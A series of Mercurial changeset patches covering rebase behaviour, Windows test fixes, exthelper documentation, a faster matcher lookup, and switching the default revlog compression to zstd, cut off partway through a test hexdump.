b/rust/hg-cpython/Cargo.toml @@ -29,5 +29,5 @@ env_logger = "0.7.1" [dependencies.cpython] -version = "0.4.1" +version = "0.5.2" default-features = false # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1616686696 25200 # Thu Mar 25 08:38:16 2021 -0700 # Node ID 82b17bfc13ebf0dd1619953c200c7421ba3315ff # Parent c7c6c11fe1e4fd3b936b2145b112bd8006a88ba6 rebase: remove duplicate initialization of a field `obsolete_with_successor_in_destination` is already initialized in the constructor. Differential Revision: https://phab.mercurial-scm.org/D10268 diff --git a/hgext/rebase.py b/hgext/rebase.py --- a/hgext/rebase.py +++ b/hgext/rebase.py @@ -350,7 +350,6 @@ def _handleskippingobsolete(self): """Compute structures necessary for skipping obsolete revisions""" - self.obsolete_with_successor_in_destination = {} if not self.ui.configbool(b'experimental', b'rebaseskipobsolete'): return obsoleteset = {r for r in self.state if self.repo[r].obsolete()} # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1616697316 25200 # Thu Mar 25 11:35:16 2021 -0700 # Node ID d9601243b73c16b5894492a33895bf9e457602e0 # Parent 82b17bfc13ebf0dd1619953c200c7421ba3315ff rebase: when using --keep, don't care about pruned commits or divergence `hg rebase --keep` creates duplicate commits (not successors), so I was surprised that it still skips pruned commits and errors out if it "would cause divergence" (it wouldn't). I guess this was just an oversight. We didn't have any tests for it, so I also included that. 
Differential Revision: https://phab.mercurial-scm.org/D10269 diff --git a/hgext/rebase.py b/hgext/rebase.py --- a/hgext/rebase.py +++ b/hgext/rebase.py @@ -350,6 +350,8 @@ def _handleskippingobsolete(self): """Compute structures necessary for skipping obsolete revisions""" + if self.keepf: + return if not self.ui.configbool(b'experimental', b'rebaseskipobsolete'): return obsoleteset = {r for r in self.state if self.repo[r].obsolete()} diff --git a/tests/test-rebase-obsolete2.t b/tests/test-rebase-obsolete2.t --- a/tests/test-rebase-obsolete2.t +++ b/tests/test-rebase-obsolete2.t @@ -317,3 +317,25 @@ note: not rebasing 20:8b31da3c4919 "dummy change", already in destination as 18:601db7a18f51 "dummy change successor" rebasing 21:7bdc8a87673d tip "dummy change" $ cd .. + +Can rebase pruned and rewritten commits with --keep + + $ hg init keep + $ cd keep + $ hg debugdrawdag <<'EOS' + > D + > | + > C + > | + > F B E # prune: B + > \|/ # rebase: C -> E + > A + > EOS + 1 new orphan changesets + + $ hg rebase -b D -d F --keep + rebasing 1:112478962961 B "B" + rebasing 4:26805aba1e60 C "C" + rebasing 5:f585351a92f8 D tip "D" + + $ cd .. # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1616711911 25200 # Thu Mar 25 15:38:31 2021 -0700 # Node ID 6b42343f3cb61bfedc5909979bf1252df462ea83 # Parent d9601243b73c16b5894492a33895bf9e457602e0 tests: avoid using rebaseskipobsolete=0 I'm about to delete the `rebaseskipobsolete` config. This patch updates a test to get hidden commits into the rebase state by using `hg debugobsolete` instead of setting `rebaseskipobsolete=0`. 
Differential Revision: https://phab.mercurial-scm.org/D10270 diff --git a/tests/test-rebase-obsolete4.t b/tests/test-rebase-obsolete4.t --- a/tests/test-rebase-obsolete4.t +++ b/tests/test-rebase-obsolete4.t @@ -23,7 +23,6 @@ $ hg init rbsrepo && cd rbsrepo $ echo "[experimental]" > .hg/hgrc $ echo "evolution=true" >> .hg/hgrc - $ echo "rebaseskipobsolete=on" >> .hg/hgrc $ echo root > root && hg ci -Am root adding root $ echo a > a && hg ci -Am a @@ -124,30 +123,24 @@ / o 0:426bada5c675 A -For some reasons (--hidden, rebaseskipobsolete=0, directaccess, etc.), +For some reasons (--hidden, directaccess, etc.), rebasestate may contain hidden hashes. "rebase --abort" should work regardless. $ hg init $TESTTMP/hidden-state1 $ cd $TESTTMP/hidden-state1 - $ cat >> .hg/hgrc <<EOF - > [experimental] - > rebaseskipobsolete=0 - > EOF $ hg debugdrawdag <<'EOS' > C > | - > D B # prune: B, C - > |/ # B/D=B + > D B # B/D=B + > |/ > A > EOS $ eval `hg tags -T '{tag}={node}\n'` $ rm .hg/localtags - $ hg update -q $C --hidden - updated to hidden changeset 7829726be4dc - (hidden revision '7829726be4dc' is pruned) + $ hg update -q $C $ hg rebase -s $B -d $D rebasing 1:2ec65233581b "B" merging D @@ -155,12 +148,19 @@ unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') [240] + $ hg debugobsolete $B + 1 new obsolescence markers + obsoleted 1 changesets + 1 new orphan changesets + $ hg debugobsolete $C + 1 new obsolescence markers + obsoleted 1 changesets $ cp -R . 
$TESTTMP/hidden-state2 $ hg log -G @ 2:b18e25de2cf5 D | - | % 1:2ec65233581b B (pruned using prune) + | % 1:2ec65233581b B (pruned) |/ o 0:426bada5c675 A @@ -183,14 +183,10 @@ (no more unresolved files) continue: hg rebase --continue $ hg rebase --continue - rebasing 1:2ec65233581b "B" - rebasing 3:7829726be4dc tip "C" + note: not rebasing 1:2ec65233581b "B", it has no successor + note: not rebasing 3:7829726be4dc tip "C", it has no successor $ hg log -G - @ 5:1964d5d5b547 C - | - o 4:68deb90c12a2 B - | - o 2:b18e25de2cf5 D + @ 2:b18e25de2cf5 D | o 0:426bada5c675 A # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1617476420 14400 # Sat Apr 03 15:00:20 2021 -0400 # Node ID 466236e99eac18db6286a95297bcc715d6170f28 # Parent 6b42343f3cb61bfedc5909979bf1252df462ea83 tests: update the detailed exit codes in test-phabricator.t I'm guessing this has slipped through because most people don't have the necessary `pytest-vcr` package installed. Differential Revision: https://phab.mercurial-scm.org/D10297 diff --git a/tests/test-phabricator.t b/tests/test-phabricator.t --- a/tests/test-phabricator.t +++ b/tests/test-phabricator.t @@ -48,7 +48,7 @@ options: (use 'hg debugcallconduit -h' to show more help) - [255] + [10] $ hg phabread abort: empty DREVSPEC set [255] # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1617476529 14400 # Sat Apr 03 15:02:09 2021 -0400 # Node ID 7ce8b4d2bd55f100de4faec766bcf177832079b6 # Parent 466236e99eac18db6286a95297bcc715d6170f28 tests: update the detailed exit codes for icasefs gated tests The fact that there's already a detailed exit code after the last change here in test-casecollision-merge.t gives me some pause, but maybe it was found and changed manually? 
Differential Revision: https://phab.mercurial-scm.org/D10298 diff --git a/tests/test-casecollision-merge.t b/tests/test-casecollision-merge.t --- a/tests/test-casecollision-merge.t +++ b/tests/test-casecollision-merge.t @@ -145,7 +145,7 @@ $ hg merge abort: case-folding collision between [aA] and [Aa] (re) - [255] + [20] $ hg parents --template '{rev}\n' 4 $ hg status -A @@ -158,7 +158,7 @@ 1 files updated, 0 files merged, 2 files removed, 0 files unresolved $ hg merge abort: case-folding collision between [aA] and [Aa] (re) - [255] + [20] $ hg parents --template '{rev}\n' 2 $ hg status -A @@ -213,7 +213,7 @@ $ hg merge 0 abort: case-folding collision between Aa and directory of aA/a - [255] + [20] (note: no collision between 0 and 00 or 000/f) Directory case-folding collision: @@ -328,7 +328,7 @@ A B $ hg update abort: case-folding collision between [bB] and [Bb] (re) - [255] + [20] $ hg update --check abort: uncommitted changes diff --git a/tests/test-casefolding.t b/tests/test-casefolding.t --- a/tests/test-casefolding.t +++ b/tests/test-casefolding.t @@ -115,7 +115,7 @@ $ hg up A: untracked file differs abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ cat a gold $ rm a # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1617495937 14400 # Sat Apr 03 20:25:37 2021 -0400 # Node ID 915a60bf3cb627a59be97084c7161700d8f5b4f9 # Parent 7ce8b4d2bd55f100de4faec766bcf177832079b6 tests: handle Windows file separator differences in test-config.t Differential Revision: https://phab.mercurial-scm.org/D10299 diff --git a/tests/test-config.t b/tests/test-config.t --- a/tests/test-config.t +++ b/tests/test-config.t @@ -1,3 +1,17 @@ +Windows needs ';' as a file separator in an environment variable, and MSYS +doesn't automatically convert it in every case. 
+ +#if windows + $ path_list_var() { + > echo $1 | sed 's/:/;/' + > } +#else + $ path_list_var() { + > echo $1 + > } +#endif + + hide outer repo $ hg init @@ -446,7 +460,7 @@ If file B is read after file A, value from B overwrite value from A. - $ HGRCPATH="file-A.rc:file-B.rc" hg config config-test.basic + $ HGRCPATH=`path_list_var "file-A.rc:file-B.rc"` hg config config-test.basic value-B Ordering from include @@ -462,7 +476,7 @@ command line override --------------------- - $ HGRCPATH="file-A.rc:file-B.rc" hg config config-test.basic --config config-test.basic=value-CLI + $ HGRCPATH=`path_list_var "file-A.rc:file-B.rc"` hg config config-test.basic --config config-test.basic=value-CLI value-CLI Alias ordering @@ -480,7 +494,7 @@ value-A $ HGRCPATH="file-B.rc" hg log -r . value-B - $ HGRCPATH="file-A.rc:file-B.rc" hg log -r . + $ HGRCPATH=`path_list_var "file-A.rc:file-B.rc"` hg log -r . value-B Alias and include @@ -497,5 +511,5 @@ command line override --------------------- - $ HGRCPATH="file-A.rc:file-B.rc" hg log -r . --config ui.logtemplate="value-CLI\n" + $ HGRCPATH=`path_list_var "file-A.rc:file-B.rc"` hg log -r . --config ui.logtemplate="value-CLI\n" value-CLI # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1617496005 14400 # Sat Apr 03 20:26:45 2021 -0400 # Node ID 802ba3c81507fcf1c470485e19278edc73f782f8 # Parent 915a60bf3cb627a59be97084c7161700d8f5b4f9 tests: stablize test-hook.t on Windows Apparently, hooks can't run `echo` directly, even from MSYS. 
Differential Revision: https://phab.mercurial-scm.org/D10300 diff --git a/tests/test-hook.t b/tests/test-hook.t --- a/tests/test-hook.t +++ b/tests/test-hook.t @@ -1407,12 +1407,12 @@ $ cat << EOF >> .hg/hgrc > [hooks] - > pre-version.testing-default=echo '### default ###' plain: \${HGPLAIN:-'<unset>'} - > pre-version.testing-yes=echo '### yes #######' plain: \${HGPLAIN:-'<unset>'} + > pre-version.testing-default=sh -c "echo '### default ###' plain: \${HGPLAIN:-'<unset>'}" + > pre-version.testing-yes=sh -c "echo '### yes #######' plain: \${HGPLAIN:-'<unset>'}" > pre-version.testing-yes:run-with-plain=yes - > pre-version.testing-no=echo '### no ########' plain: \${HGPLAIN:-'<unset>'} + > pre-version.testing-no=sh -c "echo '### no ########' plain: \${HGPLAIN:-'<unset>'}" > pre-version.testing-no:run-with-plain=no - > pre-version.testing-auto=echo '### auto ######' plain: \${HGPLAIN:-'<unset>'} + > pre-version.testing-auto=sh -c "echo '### auto ######' plain: \${HGPLAIN:-'<unset>'}" > pre-version.testing-auto:run-with-plain=auto > EOF # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1617498945 14400 # Sat Apr 03 21:15:45 2021 -0400 # Node ID ed286d150aa89d742a24015be22f0b1c36855697 # Parent 802ba3c81507fcf1c470485e19278edc73f782f8 setup: copy python3.dll next to hg.exe when building on Windows for hgext.git I thought I took care of this already, but it must have been that I just manually copied the file over locally when debugging why the pygit2 library wasn't loading. The problem with that is what was copied over was from py38, and then running a py39 build hard crashed when the extension was loaded. Differential Revision: https://phab.mercurial-scm.org/D10301 diff --git a/setup.py b/setup.py --- a/setup.py +++ b/setup.py @@ -817,6 +817,22 @@ if not os.path.exists(dest): shutil.copy(buf.value, dest) + # Also overwrite python3.dll so that hgext.git is usable. 
+ # TODO: also handle the MSYS flavor + if sys.version_info[0] >= 3: + python_x = os.path.join( + os.path.dirname(fsdecode(buf.value)), + "python3.dll", + ) + + if os.path.exists(python_x): + dest = os.path.join( + os.path.dirname(self.hgtarget), + os.path.basename(python_x), + ) + + shutil.copy(python_x, dest) + if not pythonlib: log.warn( 'could not determine Python DLL filename; assuming pythonXY' # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1617641073 14400 # Mon Apr 05 12:44:33 2021 -0400 # Node ID 41d43d12c2c4206b9316adb0edb58da929d25c6e # Parent ed286d150aa89d742a24015be22f0b1c36855697 tests: restore the ability to run `black` on Windows The hghave test for black silently stopped working with the change in 08fd76a553c9. This was the output of what it was hitting when run in the test environment: Traceback (most recent call last):\r (esc) File "c:\\users\\matt\\appdata\\local\\programs\\python\\python39\\lib\\runpy.py", line 197, in _run_module_as_main\r (esc) return _run_code(code, main_globals, None,\r (esc) File "c:\\users\\matt\\appdata\\local\\programs\\python\\python39\\lib\\runpy.py", line 87, in _run_code\r (esc) exec(code, run_globals)\r (esc) File "c:\\Users\\Matt\\AppData\\Roaming\\Python\\Python39\\Scripts\\black.exe\\__main__.py", line 4, in <module>\r (esc) File "C:\\Users\\Matt\\AppData\\Roaming\\Python\\Python39\\site-packages\\black\\__init__.py", line 70, in <module>\r (esc) CACHE_DIR = Path(user_cache_dir("black", version=__version__))\r (esc) File "C:\\Users\\Matt\\AppData\\Roaming\\Python\\Python39\\site-packages\\appdirs.py", line 293, in user_cache_dir\r (esc) path = os.path.normpath(_get_win_folder("CSIDL_LOCAL_APPDATA"))\r (esc) File "C:\\Users\\Matt\\AppData\\Roaming\\Python\\Python39\\site-packages\\appdirs.py", line 481, in _get_win_folder_with_pywin32\r (esc) dir = shell.SHGetFolderPath(0, getattr(shellcon, csidl_name), 0, 0)\r (esc) pywintypes.com_error: (-2147024893, '$ENOTDIR$.', None, None)\r 
(esc) [1] Differential Revision: https://phab.mercurial-scm.org/D10310 diff --git a/tests/hghave.py b/tests/hghave.py --- a/tests/hghave.py +++ b/tests/hghave.py @@ -140,9 +140,22 @@ """Return the match object if cmd executes successfully and its output is matched by the supplied regular expression. """ + + # Tests on Windows have to fake USERPROFILE to point to the test area so + # that `~` is properly expanded on py3.8+. However, some tools like black + # make calls that need the real USERPROFILE in order to run `foo --version`. + env = os.environ + if os.name == 'nt': + env = os.environ.copy() + env['USERPROFILE'] = env['REALUSERPROFILE'] + r = re.compile(regexp) p = subprocess.Popen( - cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT + cmd, + shell=True, + stdout=subprocess.PIPE, + stderr=subprocess.STDOUT, + env=env, ) s = p.communicate()[0] ret = p.returncode diff --git a/tests/run-tests.py b/tests/run-tests.py --- a/tests/run-tests.py +++ b/tests/run-tests.py @@ -1371,6 +1371,7 @@ env['TESTNAME'] = self.name env['HOME'] = _bytes2sys(self._testtmp) if os.name == 'nt': + env['REALUSERPROFILE'] = env['USERPROFILE'] # py3.8+ ignores HOME: https://bugs.python.org/issue36264 env['USERPROFILE'] = env['HOME'] formated_timeout = _bytes2sys(b"%d" % default_defaults['timeout'][1]) diff --git a/tests/test-check-format.t b/tests/test-check-format.t --- a/tests/test-check-format.t +++ b/tests/test-check-format.t @@ -1,5 +1,11 @@ #require black test-repo +Black needs the real USERPROFILE in order to run on Windows +#if msys + $ USERPROFILE="$REALUSERPROFILE" + $ export USERPROFILE +#endif + $ cd $RUNTESTDIR/.. 
$ black --check --diff `hg files 'set:(**.py + grep("^#!.*python")) - mercurial/thirdparty/**'` # HG changeset patch # User Kyle Lippincott <spectral@google.com> # Date 1617134722 25200 # Tue Mar 30 13:05:22 2021 -0700 # Node ID 887f89b100ac7917f9060f2c194a41ae727ae74a # Parent 41d43d12c2c4206b9316adb0edb58da929d25c6e exthelper: improve docs to indicate what module vars are needed I recently tried creating an extension "from scratch" using exthelper, and it wasn't obvious that you needed these. I believe that a careful reading of one of the comments would tell you that they were required, but it's easy to miss and having the examples be "complete" is helpful. Differential Revision: https://phab.mercurial-scm.org/D10295 diff --git a/mercurial/exthelper.py b/mercurial/exthelper.py --- a/mercurial/exthelper.py +++ b/mercurial/exthelper.py @@ -46,13 +46,22 @@ # ext.py eh = exthelper.exthelper() - # As needed: + # As needed (failure to do this will mean your registration will not + # happen): cmdtable = eh.cmdtable configtable = eh.configtable filesetpredicate = eh.filesetpredicate revsetpredicate = eh.revsetpredicate templatekeyword = eh.templatekeyword + # As needed (failure to do this will mean your eh.wrap*-decorated + # functions will not wrap, and/or your eh.*setup-decorated functions + # will not execute): + uisetup = eh.finaluisetup + extsetup = eh.finalextsetup + reposetup = eh.finalreposetup + uipopulate = eh.finaluipopulate + @eh.command(b'mynewcommand', [(b'r', b'rev', [], _(b'operate on these revisions'))], _(b'-r REV...'), @@ -155,7 +164,7 @@ c(ui) def finalextsetup(self, ui): - """Method to be used as a the extension extsetup + """Method to be used as the extension extsetup The following operations belong here: @@ -201,6 +210,9 @@ example:: + # Required, otherwise your uisetup function(s) will not execute. 
+ uisetup = eh.finaluisetup + @eh.uisetup def setupbabar(ui): print('this is uisetup!') @@ -213,6 +225,9 @@ example:: + # Required, otherwise your uipopulate function(s) will not execute. + uipopulate = eh.finaluipopulate + @eh.uipopulate def setupfoo(ui): print('this is uipopulate!') @@ -225,6 +240,9 @@ example:: + # Required, otherwise your extsetup function(s) will not execute. + extsetup = eh.finalextsetup + @eh.extsetup def setupcelestine(ui): print('this is extsetup!') @@ -237,6 +255,9 @@ example:: + # Required, otherwise your reposetup function(s) will not execute. + reposetup = eh.finalreposetup + @eh.reposetup def setupzephir(ui, repo): print('this is reposetup!') @@ -258,6 +279,11 @@ example:: + # Required if `extension` is not provided + uisetup = eh.finaluisetup + # Required if `extension` is provided + extsetup = eh.finalextsetup + @eh.wrapcommand(b'summary') def wrapsummary(orig, ui, repo, *args, **kwargs): ui.note(b'Barry!') @@ -298,8 +324,11 @@ example:: - @eh.function(discovery, b'checkheads') - def wrapfunction(orig, *args, **kwargs): + # Required, otherwise the function will not be wrapped + uisetup = eh.finaluisetup + + @eh.wrapfunction(discovery, b'checkheads') + def wrapcheckheads(orig, *args, **kwargs): ui.note(b'His head smashed in and his heart cut out') return orig(*args, **kwargs) """ # HG changeset patch # User Kyle Lippincott <spectral@google.com> # Date 1617220014 25200 # Wed Mar 31 12:46:54 2021 -0700 # Node ID 8bca353b1ebc25c08dd2d72bbf4efd7b44b7bd1b # Parent 887f89b100ac7917f9060f2c194a41ae727ae74a match: convert O(n) to O(log n) in exactmatcher.visitchildrenset When using narrow, during rebase this is called (at least) once per directory in the set of files in the commit being rebased. 
Every time it's called, we did the set arithmetic (now extracted and cached), which was probably pretty cheap but not necessary to repeat each time, looped over every item in the matcher and kept things that started with the directory we were querying. With very large narrowspecs, and a commit that touched a file in a large number of directories, this was slow. In a pathological repo, the rebase of a single commit (that touched over 17k files, I believe in approximately as many directories) with a narrowspec that had >32k entries took 8,246s of profiled time, with 5,007s of that spent in visitchildrenset (transitively). With this change, the time spent in visitchildrenset is less than 34s (which is where my profile cut off). Most of the remaining time was network access due to our custom remotefilelog-based setup not properly prefetching. Differential Revision: https://phab.mercurial-scm.org/D10294 diff --git a/mercurial/match.py b/mercurial/match.py --- a/mercurial/match.py +++ b/mercurial/match.py @@ -7,6 +7,7 @@ from __future__ import absolute_import, print_function +import bisect import copy import itertools import os @@ -798,14 +799,38 @@ def visitdir(self, dir): return dir in self._dirs + @propertycache + def _visitchildrenset_candidates(self): + """A memoized set of candidates for visitchildrenset.""" + return self._fileset | self._dirs - {b''} + + @propertycache + def _sorted_visitchildrenset_candidates(self): + """A memoized sorted list of candidates for visitchildrenset.""" + return sorted(self._visitchildrenset_candidates) + def visitchildrenset(self, dir): if not self._fileset or dir not in self._dirs: return set() - candidates = self._fileset | self._dirs - {b''} - if dir != b'': + if dir == b'': + candidates = self._visitchildrenset_candidates + else: + candidates = self._sorted_visitchildrenset_candidates d = dir + b'/' - candidates = {c[len(d) :] for c in candidates if c.startswith(d)} + # Use bisect to find the first element potentially starting 
with d + # (i.e. >= d). This should always find at least one element (we'll + # assert later if this is not the case). + first = bisect.bisect_left(candidates, d) + # We need a representation of the first element that is > d that + # does not start with d, so since we added a `/` on the end of dir, + # we'll add whatever comes after slash (we could probably assume + # that `0` is after `/`, but let's not) to the end of dir instead. + dnext = dir + encoding.strtolocal(chr(ord(b'/') + 1)) + # Use bisect to find the first element >= d_next + last = bisect.bisect_left(candidates, dnext, lo=first) + dlen = len(d) + candidates = {c[dlen:] for c in candidates[first:last]} # self._dirs includes all of the directories, recursively, so if # we're attempting to match foo/bar/baz.txt, it'll have '', 'foo', # 'foo/bar' in it. Thus we can safely ignore a candidate that has a # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1617795075 -7200 # Wed Apr 07 13:31:15 2021 +0200 # Node ID 0abf5eba00423035c975213416d56ff9c24d1989 # Parent 8bca353b1ebc25c08dd2d72bbf4efd7b44b7bd1b rhg: make rhg recognise it supports zstd compression for revlogs It already did, but was not aware of it. Differential Revision: https://phab.mercurial-scm.org/D10324 diff --git a/rust/hg-core/src/requirements.rs b/rust/hg-core/src/requirements.rs --- a/rust/hg-core/src/requirements.rs +++ b/rust/hg-core/src/requirements.rs @@ -81,6 +81,7 @@ SHARESAFE_REQUIREMENT, SPARSEREVLOG_REQUIREMENT, RELATIVE_SHARED_REQUIREMENT, + REVLOG_COMPRESSION_ZSTD, // As of this writing everything rhg does is read-only. // When it starts writing to the repository, it’ll need to either keep the // persistent nodemap up to date or remove this entry: @@ -151,3 +152,7 @@ /// `.hg/store/requires` are present. 
#[allow(unused)] pub(crate) const SHARESAFE_REQUIREMENT: &str = "share-safe"; + +/// A repository that use zstd compression inside its revlog +#[allow(unused)] +pub(crate) const REVLOG_COMPRESSION_ZSTD: &str = "revlog-compression-zstd"; # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1617728119 -7200 # Tue Apr 06 18:55:19 2021 +0200 # Node ID 84a93fa7ecfd9e6509d08824e2d11831e582a2fd # Parent 0abf5eba00423035c975213416d56ff9c24d1989 revlog-compression: use zstd by default (if available) As seen in changeset bb271ec2fbfb, zstd is 20% to 50% faster for reading and writing. Take advantage of the new config behavior to try zstd by default, falling back to zlib if zstd is not available on that platform. Differential Revision: https://phab.mercurial-scm.org/D10326 diff --git a/mercurial/configitems.py b/mercurial/configitems.py --- a/mercurial/configitems.py +++ b/mercurial/configitems.py @@ -1307,7 +1307,7 @@ coreconfigitem( b'format', b'revlog-compression', - default=lambda: [b'zlib'], + default=lambda: [b'zstd', b'zlib'], alias=[(b'experimental', b'format.compression')], ) coreconfigitem( diff --git a/mercurial/helptext/config.txt b/mercurial/helptext/config.txt --- a/mercurial/helptext/config.txt +++ b/mercurial/helptext/config.txt @@ -966,7 +966,7 @@ On some systems, the Mercurial installation may lack `zstd` support. - Default is `zlib`. + Default is `zstd` if available, `zlib` otherwise. ``bookmarks-in-store`` Store bookmarks in .hg/store/. 
This means that bookmarks are shared when diff --git a/mercurial/upgrade_utils/actions.py b/mercurial/upgrade_utils/actions.py --- a/mercurial/upgrade_utils/actions.py +++ b/mercurial/upgrade_utils/actions.py @@ -395,10 +395,21 @@ return True +_has_zstd = ( + b'zstd' in util.compengines + and util.compengines[b'zstd'].available() + and util.compengines[b'zstd'].revlogheader() +) + + @registerformatvariant class compressionengine(formatvariant): name = b'compression' - default = b'zlib' + + if _has_zstd: + default = b'zstd' + else: + default = b'zlib' description = _( b'Compresion algorithm used to compress data. ' diff --git a/tests/test-bundle.t b/tests/test-bundle.t --- a/tests/test-bundle.t +++ b/tests/test-bundle.t @@ -295,13 +295,16 @@ #if reporevlogstore $ hg -R test debugcreatestreamclonebundle packed.hg - writing 2664 bytes for 6 files + writing 2664 bytes for 6 files (no-zstd !) + writing 2665 bytes for 6 files (zstd !) bundle requirements: generaldelta, revlogv1, sparserevlog $ f -B 64 --size --sha1 --hexdump packed.hg - packed.hg: size=2840, sha1=12bf3eee3eb8a04c503ce2d29b48f0135c7edff5 + packed.hg: size=2840, sha1=12bf3eee3eb8a04c503ce2d29b48f0135c7edff5 (no-zstd !) + packed.hg: size=2841, sha1=8b645a65f49b0ae43042a9f3da56d4bfdf1c7f99 (zstd !) 0000: 48 47 53 31 55 4e 00 00 00 00 00 00 00 06 00 00 |HGS1UN..........| - 0010: 00 00 00 00 0a 68 00 23 67 65 6e 65 72 61 6c 64 |.....h.#generald| + 0010: 00 00 00 00 0a 68 00 23 67 65 6e 65 72 61 6c 64 |.....h.#generald| (no-zstd !) + 0010: 00 00 00 00 0a 69 00 23 67 65 6e 65 72 61 6c 64 |.....i.#generald| (zstd !) 
0020: 65 6c 74 61 2c 72 65 76 6c 6f 67 76 31 2c 73 70 |elta,revlogv1,sp| 0030: 61 72 73 65 72 65 76 6c 6f 67 00 64 61 74 61 2f |arserevlog.data/| diff --git a/tests/test-clone-uncompressed.t b/tests/test-clone-uncompressed.t --- a/tests/test-clone-uncompressed.t +++ b/tests/test-clone-uncompressed.t @@ -178,16 +178,20 @@ #if stream-legacy $ hg clone --stream -U http://localhost:$HGPORT clone1 streaming all changes - 1027 files to transfer, 96.3 KB of data - transferred 96.3 KB in * seconds (*/sec) (glob) + 1027 files to transfer, 96.3 KB of data (no-zstd !) + transferred 96.3 KB in * seconds (*/sec) (glob) (no-zstd !) + 1027 files to transfer, 93.5 KB of data (zstd !) + transferred 93.5 KB in * seconds (* */sec) (glob) (zstd !) searching for changes no changes found #endif #if stream-bundle2 $ hg clone --stream -U http://localhost:$HGPORT clone1 streaming all changes - 1030 files to transfer, 96.5 KB of data - transferred 96.5 KB in * seconds (* */sec) (glob) + 1030 files to transfer, 96.5 KB of data (no-zstd !) + transferred 96.5 KB in * seconds (*/sec) (glob) (no-zstd !) + 1030 files to transfer, 93.6 KB of data (zstd !) + transferred 93.6 KB in * seconds (* */sec) (glob) (zstd !) $ ls -1 clone1/.hg/cache branch2-base @@ -211,39 +215,56 @@ $ f --size --hex --bytes 256 body - body: size=112262 + body: size=112262 (no-zstd !) + body: size=109410 (zstd !) 0000: 04 6e 6f 6e 65 48 47 32 30 00 00 00 00 00 00 00 |.noneHG20.......| - 0010: 7f 07 53 54 52 45 41 4d 32 00 00 00 00 03 00 09 |..STREAM2.......| - 0020: 05 09 04 0c 44 62 79 74 65 63 6f 75 6e 74 39 38 |....Dbytecount98| - 0030: 37 37 35 66 69 6c 65 63 6f 75 6e 74 31 30 33 30 |775filecount1030| + 0010: 7f 07 53 54 52 45 41 4d 32 00 00 00 00 03 00 09 |..STREAM2.......| (no-zstd !) + 0020: 05 09 04 0c 44 62 79 74 65 63 6f 75 6e 74 39 38 |....Dbytecount98| (no-zstd !) + 0030: 37 37 35 66 69 6c 65 63 6f 75 6e 74 31 30 33 30 |775filecount1030| (no-zstd !) 
+ 0010: 99 07 53 54 52 45 41 4d 32 00 00 00 00 03 00 09 |..STREAM2.......| (zstd !) + 0020: 05 09 04 0c 5e 62 79 74 65 63 6f 75 6e 74 39 35 |....^bytecount95| (zstd !) + 0030: 38 39 37 66 69 6c 65 63 6f 75 6e 74 31 30 33 30 |897filecount1030| (zstd !) 0040: 72 65 71 75 69 72 65 6d 65 6e 74 73 64 6f 74 65 |requirementsdote| 0050: 6e 63 6f 64 65 25 32 43 66 6e 63 61 63 68 65 25 |ncode%2Cfncache%| 0060: 32 43 67 65 6e 65 72 61 6c 64 65 6c 74 61 25 32 |2Cgeneraldelta%2| - 0070: 43 72 65 76 6c 6f 67 76 31 25 32 43 73 70 61 72 |Crevlogv1%2Cspar| - 0080: 73 65 72 65 76 6c 6f 67 25 32 43 73 74 6f 72 65 |serevlog%2Cstore| - 0090: 00 00 80 00 73 08 42 64 61 74 61 2f 30 2e 69 00 |....s.Bdata/0.i.| - 00a0: 03 00 01 00 00 00 00 00 00 00 02 00 00 00 01 00 |................| - 00b0: 00 00 00 00 00 00 01 ff ff ff ff ff ff ff ff 80 |................| - 00c0: 29 63 a0 49 d3 23 87 bf ce fe 56 67 92 67 2c 69 |)c.I.#....Vg.g,i| - 00d0: d1 ec 39 00 00 00 00 00 00 00 00 00 00 00 00 75 |..9............u| - 00e0: 30 73 08 42 64 61 74 61 2f 31 2e 69 00 03 00 01 |0s.Bdata/1.i....| - 00f0: 00 00 00 00 00 00 00 02 00 00 00 01 00 00 00 00 |................| + 0070: 43 72 65 76 6c 6f 67 76 31 25 32 43 73 70 61 72 |Crevlogv1%2Cspar| (no-zstd !) + 0080: 73 65 72 65 76 6c 6f 67 25 32 43 73 74 6f 72 65 |serevlog%2Cstore| (no-zstd !) + 0090: 00 00 80 00 73 08 42 64 61 74 61 2f 30 2e 69 00 |....s.Bdata/0.i.| (no-zstd !) + 00a0: 03 00 01 00 00 00 00 00 00 00 02 00 00 00 01 00 |................| (no-zstd !) + 00b0: 00 00 00 00 00 00 01 ff ff ff ff ff ff ff ff 80 |................| (no-zstd !) + 00c0: 29 63 a0 49 d3 23 87 bf ce fe 56 67 92 67 2c 69 |)c.I.#....Vg.g,i| (no-zstd !) + 00d0: d1 ec 39 00 00 00 00 00 00 00 00 00 00 00 00 75 |..9............u| (no-zstd !) + 00e0: 30 73 08 42 64 61 74 61 2f 31 2e 69 00 03 00 01 |0s.Bdata/1.i....| (no-zstd !) + 00f0: 00 00 00 00 00 00 00 02 00 00 00 01 00 00 00 00 |................| (no-zstd !) 
